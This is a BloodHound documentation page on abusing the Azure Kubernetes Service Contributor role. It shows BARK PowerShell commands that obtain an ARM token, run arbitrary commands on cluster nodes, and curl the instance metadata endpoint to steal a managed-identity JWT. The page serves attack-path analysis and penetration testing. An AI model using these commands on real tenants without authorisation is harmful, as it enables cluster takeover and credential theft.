> ## Documentation Index > Fetch the complete documentation index at: https://bloodhound.specterops.io/llms.txt > Use this file to discover all available pages before exploring further. # AZAKSContributor > The Azure Kubernetes Service Contributor role grants full control of the target Azure Kubernetes Service Managed Cluster. Applies to BloodHound Enterprise and CE This includes the ability to remotely fetch administrator credentials for the cluster as well as the ability to execute arbitrary commands on compute nodes associated with the AKS Managed Cluster. ## Abuse Info You can use BARK’s Invoke-AzureRMAKSRunCommand function to execute commands on compute nodes associated with the target AKS Managed Cluster. This function requires you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to execute commands on the cluster. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token: ```bash theme={null} $ARMToken = Get-ARMTokenWithRefreshToken ` -RefreshToken "0.ARwA6WgJJ9X2qk..." ` -TenantID "contoso.onmicrosoft.com" ``` Now you can use BARK’s Invoke-AzureRMAKSRunCommand function to execute a command against the target AKS Managed Cluster. For example, to run a simple “whoami” command: ```bash theme={null} Invoke-AzureRMAKSRunCommand ` -Token $ARMToken ` -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" ` -Command "whoami" ``` If the AKS Cluster or its associated Virtual Machine Scale Sets have managed identity assignments, you can use BARK’s Invoke-AzureRMAKSRunCommand function to retrieve a JWT for the managed identity Service Principal like this: ```bash theme={null} Invoke-AzureRMAKSRunCommand ` -Token $ARMToken ` -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" ` -Command \\'curl -i -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://graph.microsoft.com/&api-version=2019-08-01"\\' ``` If successful, the output will include a JWT for the managed identity service principal. ## Opsec Considerations This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse. ## References * [https://github.com/BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) * [https://www.netspi.com/blog/technical/cloud-penetration-testing/extract-credentials-from-azure-kubernetes-service/](https://www.netspi.com/blog/technical/cloud-penetration-testing/extract-credentials-from-azure-kubernetes-service/) * [https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/](https://specterops.io/blog/2023/04/18/introducing-bloodhound-4-3-get-global-admin-more-often/)